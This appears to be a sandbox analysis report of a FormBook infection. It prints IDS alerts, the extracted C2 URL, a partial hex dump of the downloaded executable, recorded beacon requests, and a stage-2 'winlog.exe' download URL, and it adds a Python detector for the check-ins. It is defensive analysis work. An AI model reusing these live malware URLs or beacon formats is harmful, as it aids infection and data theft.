Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49177 -> 3.230.51.235:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49177 -> 3.230.51.235:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs: www.stone-master.info/aqu2/
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 12 Apr 2021 09:38:07 GMTServer: Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.2.34Last-Modified: Wed, 07 Apr 2021 13:42:46 GMTETag: "324f1-5bf621b210103"Accept-Ranges: bytesContent-Length: 206065Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 e5 6c 4a a8 a1 0d 24 fb a1 0d 24 fb a1 0d 24 fb 2f 05 7b fb a3 0d 24 fb a1 0d 25 fb 39 0d 24 fb 22 05 79 fb b0 0d 24 fb f5 2e 14 fb a8 0d 24 fb 66 0b 22 fb a0 0d 24 fb 52 69 63 68 a1 0d 24 fb 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 1d cd 38 45 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 5c 00 00 00 86 02 00 00 04 00 00 66 31 00 00 00 10 00 00 00 70 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 90 03 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 50 74 00 00 b4 00 00 00 00 80 03 00 67 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 00 00 80 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 fe 5b 00 00 00 10 00 00 00 5c 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 fe 11 00 00 00 70 00 00 00 12 00 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 
00 40 2e 64 61 74 61 00 00 00 d4 64 02 00 00 90 00 00 00 04 00 00 00 72 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 80 00 00 00 00 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 67 05 00 00 00 80 03 00 00 06 00 00 00 76 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic | HTTP traffic detected: GET /aqu2/?NP=K5Kf6zcgTMboCFmhMfN1gGfLaJuyFjl9HZYEWhqsekuFhK5NTINkzxSmehZhuXmdAQL3VA==&Yzrt=nN6d4T HTTP/1.1 | Host: www.playfulpainters.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /aqu2/?NP=s46ojqJle3Soul44eo8rnM8O95xci96QFJKF/CkhZ8StqcbPmW9gr+kDew9qIR65/st6pQ==&Yzrt=nN6d4T HTTP/1.1 | Host: www.hostvngiare.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /aqu2/?NP=s0A+R2zuZA1+LPHAc9M/AmUzyN8aP2GBLv9J4fG53S1jdbvs3uSd9usyNyOEpwpEqUbLdg==&Yzrt=nN6d4T HTTP/1.1 | Host: www.thesixteenthround.net | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /aqu2/?NP=toEAtfX1LDSonbWoA+2t7dOdvm85giv91wk/sm/PalfrX1ye/8l3cmSiDehl2Pz5Hv2v/g==&Yzrt=nN6d4T HTTP/1.1 | Host: www.qcmax.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /aqu2/?NP=n0kajkVKrFhs8OXGdIr62gA+iBln1jDamJdU2gSjeygeLyUnpUxBQzZrsA56E2MZ1cixJw==&Yzrt=nN6d4T HTTP/1.1 | Host: www.christlicheliebe.net | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /aqu2/?NP=mL9TVQaOR/c/9ivG5fkw1nXZWj4Nbf+dNa5NuWBK0bSYoDjNDzx/n8mD4eDtsAuI9QTUuQ==&Yzrt=nN6d4T HTTP/1.1 | Host: www.18598853855.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /aqu2/?NP=FDSTiZqS/7wu56xr5ud1XtYEDVJDcY6JSxG6s2Z614q4ZNLNR7otPveqGH1j6obhpY7v2w==&Yzrt=nN6d4T HTTP/1.1 | Host: www.starr2021.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: Joe Sandbox View | IP Address: 52.59.165.42
Source: Joe Sandbox View | IP Address: 103.141.138.117
Source: Joe Sandbox View | IP Address: 198.54.117.212
Source: Joe Sandbox View | ASN Name: HENGTONG-IDC-LLCUS
Source: Joe Sandbox View | ASN Name: AMAZON-02US
Source: Joe Sandbox View | JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
Source: global traffic | HTTP traffic detected: GET /documepnt/winlog.exe HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Connection: Keep-Alive | Host: stdypmrimelimtewsosq.dns.army
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7C8CCA5F.emf
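The check-ins above share one shape: path `/aqu2/`, a long base64-looking `NP` value that changes per request, a fixed `Yzrt=nN6d4T`, `Connection: close`, no User-Agent, and a Host that rotates through domains which are all in the extracted decoy list; the real C2 from the configuration (www.stone-master.info) is not among the hosts shown, which is how FormBook hides its one live server in the noise. The block below is an added example, not Joe Sandbox's or FormBook's code: a detector that parses raw HTTP requests rebuilt from the lines above (constructed strings; the stage-2 winlog.exe GET with its browser User-Agent is included as the negative case), clusters them by path and by the query parameters that never change, and classifies the hosts against the configuration. `CONFIG` embeds the C2 entry and a subset of the decoy list from the report.

```python
from collections import defaultdict
from urllib.parse import urlsplit

# Extracted configuration from the report (C2 list and a subset of the decoy list).
CONFIG = {
    "C2 list": ["www.stone-master.info/aqu2/"],
    "decoy": ["thesixteenthround.net", "qcmax.com", "christlicheliebe.net", "starr2021.com",
              "hostvngiare.com", "playfulpainters.com", "18598853855.com", "urbanladder.info"],
}

# Constructed raw requests rebuilt from the GET lines the report prints (CRLF restored).
RAW_REQUESTS = [
    "GET /aqu2/?NP=K5Kf6zcgTMboCFmhMfN1gGfLaJuyFjl9HZYEWhqsekuFhK5NTINkzxSmehZhuXmdAQL3VA==&Yzrt=nN6d4T HTTP/1.1\r\nHost: www.playfulpainters.com\r\nConnection: close\r\n\r\n",
    "GET /aqu2/?NP=s46ojqJle3Soul44eo8rnM8O95xci96QFJKF/CkhZ8StqcbPmW9gr+kDew9qIR65/st6pQ==&Yzrt=nN6d4T HTTP/1.1\r\nHost: www.hostvngiare.com\r\nConnection: close\r\n\r\n",
    "GET /aqu2/?NP=s0A+R2zuZA1+LPHAc9M/AmUzyN8aP2GBLv9J4fG53S1jdbvs3uSd9usyNyOEpwpEqUbLdg==&Yzrt=nN6d4T HTTP/1.1\r\nHost: www.thesixteenthround.net\r\nConnection: close\r\n\r\n",
    "GET /aqu2/?NP=toEAtfX1LDSonbWoA+2t7dOdvm85giv91wk/sm/PalfrX1ye/8l3cmSiDehl2Pz5Hv2v/g==&Yzrt=nN6d4T HTTP/1.1\r\nHost: www.qcmax.com\r\nConnection: close\r\n\r\n",
    "GET /aqu2/?NP=n0kajkVKrFhs8OXGdIr62gA+iBln1jDamJdU2gSjeygeLyUnpUxBQzZrsA56E2MZ1cixJw==&Yzrt=nN6d4T HTTP/1.1\r\nHost: www.christlicheliebe.net\r\nConnection: close\r\n\r\n",
    "GET /aqu2/?NP=mL9TVQaOR/c/9ivG5fkw1nXZWj4Nbf+dNa5NuWBK0bSYoDjNDzx/n8mD4eDtsAuI9QTUuQ==&Yzrt=nN6d4T HTTP/1.1\r\nHost: www.18598853855.com\r\nConnection: close\r\n\r\n",
    "GET /aqu2/?NP=FDSTiZqS/7wu56xr5ud1XtYEDVJDcY6JSxG6s2Z614q4ZNLNR7otPveqGH1j6obhpY7v2w==&Yzrt=nN6d4T HTTP/1.1\r\nHost: www.starr2021.com\r\nConnection: close\r\n\r\n",
    # the stage-2 download: browser User-Agent, single host, must not join the check-in cluster
    "GET /documepnt/winlog.exe HTTP/1.1\r\nAccept: */*\r\nAccept-Encoding: gzip, deflate\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0)\r\nConnection: Keep-Alive\r\nHost: stdypmrimelimtewsosq.dns.army\r\n\r\n",
]

def parse_request(raw: str) -> dict:
    """Split a raw HTTP/1.x request into method, path, undecoded query parameters and headers."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    parts = urlsplit(target)
    query = {}
    for kv in (parts.query.split("&") if parts.query else []):
        k, _, v = kv.partition("=")      # no percent/plus decoding: keep the token byte-exact
        query[k] = v
    return {"method": method, "path": parts.path, "query": query,
            "host": headers.get("host", ""), "headers": headers}

def find_checkin_clusters(raw_requests, min_hosts=3):
    """Group requests by (path, query key set); report groups spanning >= min_hosts distinct
    hosts together with the parameters whose value never changes across the group. One fixed
    path and one fixed token sprayed over many hosts is the FormBook check-in shape."""
    reqs = [parse_request(r) for r in raw_requests]
    groups = defaultdict(list)
    for r in reqs:
        groups[(r["path"], tuple(sorted(r["query"])))].append(r)
    clusters = []
    for (path, keys), members in groups.items():
        hosts = sorted({m["host"] for m in members})
        if len(hosts) < min_hosts:
            continue
        constant = {k: members[0]["query"][k] for k in keys
                    if len({m["query"][k] for m in members}) == 1}
        clusters.append({"path": path, "constant_params": constant, "hosts": hosts,
                         "without_user_agent": all("user-agent" not in m["headers"] for m in members)})
    return clusters

def strip_www(host: str) -> str:
    return host[4:] if host.startswith("www.") else host

def classify_hosts(hosts, config=CONFIG) -> dict:
    """Tell the real C2 from decoys using the extracted configuration (www. prefix ignored)."""
    c2_hosts = {strip_www(u.split("/", 1)[0]) for u in config["C2 list"]}
    decoys = {strip_www(d) for d in config["decoy"]}
    out = {"c2": [], "decoy": [], "unknown": []}
    for h in hosts:
        bare = strip_www(h)
        out["c2" if bare in c2_hosts else "decoy" if bare in decoys else "unknown"].append(h)
    return out

if __name__ == "__main__":
    for c in find_checkin_clusters(RAW_REQUESTS):
        print(c["path"], c["constant_params"], "no User-Agent:", c["without_user_agent"])
        print(classify_hosts(c["hosts"]))
```

Without the configuration, the cluster alone is the alert (the Snort ET rules above key on the same shape); with it, the host split tells the responder which single domain to block and which seven are legitimate sites the malware is merely hiding behind.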
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
Source: vbc.exe, 00000004.00000002.2186682993.0000000002740000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.2190357751.0000000003C40000.00000002.00000001.sdmp | String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: unknown | DNS traffic detected: queries for: fqe.short.gy
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 12 Apr 2021 09:39:38 GMTContent-Type: text/htmlContent-Length: 808Connection: closeLast-Modified: Sat, 27 Jul 2019 17:29:53 GMTETag: "328-58ead01c2b1d3"Accept-Ranges: bytesData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 69 65 3d 65 64 67 65 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 65 72 72 6f 72 5f 64 6f 63 73 2f 73 74 79 6c 65 73 2e 63 73 73 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 61 67 65 22 3e 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 22 3e 0a 20 20 20 20 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 63 6f 64 65 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 68 32 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0a 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 6c 65 61 64 22 3e 54 68 69 73 20 70 61 67 65 20 65 69 74 68 65 72 20 64 6f 65 73 6e 27 74 20 65 78 69 73 74 2c 20 6f 72 20 69 74 20 6d 6f 76 65 64 20 73 6f 6d 65 77 68 65 72 65 20 65 6c 73 65 2e 3c 2f 70 3e 0a 20 20 20 20 3c 68 72 2f 3e 0a 20 20 20 20 3c 70 3e 54 68 61 74 27 73 20 77 68 61 74 20 79 6f 75 20 63 61 6e 20 64 6f 3c 2f 70 3e 0a 
20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 6c 70 2d 61 63 74 69 6f 6e 73 22 3e 0a 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 6a 61 76 61 73 63 72 69 70 74 3a 6c 6f 63 61 74 69 6f 6e 2e 72 65 6c 6f 61 64 28 29 3b 22 3e 52 65 6c 6f 61 64 20 50 61 67 65 3c 2f 61 3e 0a 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 6a 61 76 61 73 63 72 69 70 74 3a 68 69 73 74 6f 72 79 2e 62 61 63 6b 28 29 3b 22 3e 42 61 63 6b 20 74 6f 20 50 72 65 76 69 6f 75 73 20 50 61 67 65 3c 2f 61 3e 0a 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 2f 22 3e 48 6f 6d 65 20 50 61 67 65 3c 2f 61 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta http-equiv="x-ua-compatible" content="ie=edge"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <title>404 Not Found</title> <link rel="stylesheet" href="/error_docs/styles.css"></head><body><div
Source: explorer.exe, 00000006.00000000.2207576712.000000000A330000.00000008.00000001.sdmp | String found in binary or memory: http://%s.com
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://amazon.fr/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://ariadna.elmundo.es/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://ariadna.elmundo.es/favicon.ico
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://arianna.libero.it/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://arianna.libero.it/favicon.ico
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://asp.usatoday.com/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://asp.usatoday.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://auone.jp/favicon.ico
Source: explorer.exe, 00000006.00000000.2207576712.000000000A330000.00000008.00000001.sdmp | String found in binary or memory: http://auto.search.msn.com/response.asp?MT=
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://br.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://browse.guardian.co.uk/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://browse.guardian.co.uk/favicon.ico
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://busca.buscape.com.br/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://busca.buscape.com.br/favicon.ico
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://busca.estadao.com.br/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.orange.es/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.lycos.es/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.com.br/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.com/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.es/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscar.ozu.es/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscar.ya.com/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busqueda.aol.com.mx/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cerca.lycos.it/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://clients5.google.com/complete/search?hl=
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cnet.search.com/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://corp.naukri.com/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://corp.naukri.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://de.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://es.ask.com/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://es.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://esearch.rakuten.co.jp/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://espanol.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://espn.go.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://find.joins.com/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://fr.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://google.pchome.com.tw/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://home.altervista.org/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://home.altervista.org/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ie.search.yahoo.com/os?command=
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://images.monster.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://img.atlas.cz/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://in.search.yahoo.com/
          Source: vbc.exe, 00000004.00000002.2186682993.0000000002740000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.2190357751.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
          Source: vbc.exe, 00000004.00000002.2186682993.0000000002740000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.2190357751.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.dada.net/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.dada.net/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://jobsearch.monster.com/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://kr.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://list.taobao.com/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=
          Source: vbc.exe, 00000004.00000002.2187003140.0000000002927000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.2190811877.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
          Source: vbc.exe, 00000004.00000002.2187003140.0000000002927000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.2190811877.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://mail.live.com/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://msk.afisha.ru/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ocnsearch.goo.ne.jp/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://openimage.interpark.com/interpark.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/favicon.ico
